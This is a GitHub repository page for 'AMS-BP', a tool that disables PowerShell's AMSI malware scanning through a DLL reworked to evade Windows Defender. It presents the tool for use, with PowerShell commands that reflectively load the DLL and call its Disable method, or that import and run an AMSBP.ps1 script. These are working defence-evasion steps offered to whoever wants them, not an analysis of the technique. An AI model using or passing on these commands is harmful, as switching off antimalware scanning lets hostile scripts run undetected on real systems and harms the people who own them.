Skip to content

Dec0ne/AMS-BP

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

44 Commits
 
 
 
 
 
 
 
 

Repository files navigation

AMS-BP

Bypass Powershell AMSI using a simple script. This Script is comprised of a DLL (source file included) which when loaded and executed will disable AmsiScanString. This DLL is based on CyberArk Post with some minor changes to defeat Windows Defender and AMSI itself which now recognizes the strings inside the DLL when it is loaded.

Usage:

Using the DLL

PS C:\> [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("$pwd\\Source.dll"))
PS C:\> [BP.AMS]::Disable()

Using the .ps1 script

PS C:\> Import-Module .\AMSBP.ps1
PS C:\> AMSBP

About

AMSI Bypass for powershell

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published